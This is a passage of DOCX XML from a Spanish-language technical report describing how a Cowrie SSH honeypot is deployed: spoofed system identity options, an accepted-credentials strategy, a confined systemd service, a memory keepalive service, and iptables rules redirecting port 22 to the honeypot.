                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Motivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">svr04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">web-prod-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">svr04 es una firma conocida de Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">version (SSH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH_9.2p1 Debian-2+deb12u3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH_9.2p1 Debian-2+deb12u5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evitar la firma por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kernel_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6.1.0-21-amd64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6.1.0-31-amd64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evitar la firma por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">arch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">linux-x64-lsb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">linux-x64-lsb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">x86_64 es la arquitectura que más malware recibe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">logtype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">rotating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">plain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Un único fichero JSON para el análisis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">desactivado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">desactivado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuera del alcance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 7. Opciones de Cowrie modificadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las firmas por defecto son relevantes porque algunos bots comprueban el nombre de la máquina, la versión del kernel o el banner SSH para detectar honeypots y abandonar la sesión. La identidad elegida es la de un Debian 12 actualizado, coherente con el sistema de ficheros simulado que incluye Cowrie. Conviene destacar que la arquitectura simulada (x86_64) no coincide con la real del servidor (ARM): el atacante interactúa con el sistema falso, no con el real, y la arquitectura x86_64 maximiza la captura de malware porque es la más común en los scripts de los atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estrategia de Credenciales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El fichero etc/userdb.txt (Anexo B) decide qué combinaciones de usuario y contraseña acepta el honeypot. Se evalúa línea a línea y gana la primera coincidencia. La estrategia elegida rechaza las contraseñas más probadas (root, 123456, password, admin, ubuntu) y acepta cualquier otra para los usuarios root, admin y ubuntu. El objetivo es doble: que los bots sigan probando y registren más credenciales, y que finalmente entren para poder capturar los comandos que ejecutan tras el acceso, que es la información más valiosa para el análisis de TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicio de systemd Confinado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie se gestiona como servicio de systemd (Anexo D) en primer plano, gracias a la variable COWRIE_STDOUT=yes, que hace que su log vaya al journal del sistema. El servicio se reinicia automáticamente si falla y aplica opciones de confinamiento: sistema de ficheros en solo lectura salvo el directorio var/ de Cowrie, sin capacidades del kernel, sin posibilidad de ganar privilegios y con un límite de 512 MB de memoria. Se comprobó que Cowrie solo escribe en var/ (logs, claves SSH del host, sesiones TTY y descargas), por lo que estas restricciones no afectan a su funcionamiento. El objetivo es que, aun en el caso improbable de que un atacante lograse escapar del entorno simulado, no pudiera modificar el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reserva de Memoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En instancias A1 de Oracle, el script de instalación activa además el servicio oci-keepalive (Anexo E), descrito en el apartado de Tecnología; en el despliegue final en Hetzner no se activa. Su implementación tiene un detalle técnico relevante: reservar memoria con bytearray() en Python no basta, porque Linux no asigna páginas físicas a memoria que solo se ha reservado y nunca se ha escrito. El programa escribe un byte en cada página de 4 KB para que toda la reserva ocupe RAM real, y el servicio prohíbe el uso de swap (MemorySwapMax=0), ya que la memoria movida a swap no contaría como utilizada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposición del Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script 03_redireccion_22.sh es el último paso y el que convierte el servidor en un honeypot público. Antes de actuar comprueba que el SSH real escucha en el 2022 y que Cowrie está activo; si alguna condición falla, se detiene. Después añade dos reglas: la redirección NAT del 22 al 2222 en la cadena PREROUTING y la aceptación del 2222 en INPUT, necesaria porque la redirección ocurre antes del filtrado. Las conexiones ya establecidas por el 22 no se ven afectadas, ya que la NAT solo se aplica a conexiones nuevas, de modo que la sesión del administrador no se corta al ejecutarlo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure filter INPUT -p tcp --dport 2222 -m conntrack --ctstate NEW -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure nat PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">netfilter-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Script de Análisis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script cowrie_analyzer.py procesa uno o varios ficheros JSON de Cowrie y está organizado en funciones independientes por tipo de análisis, lo que permite añadir métricas nuevas sin modificar las existentes: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143"/>
        <w:gridCol w:w="2620"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Eventos de Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
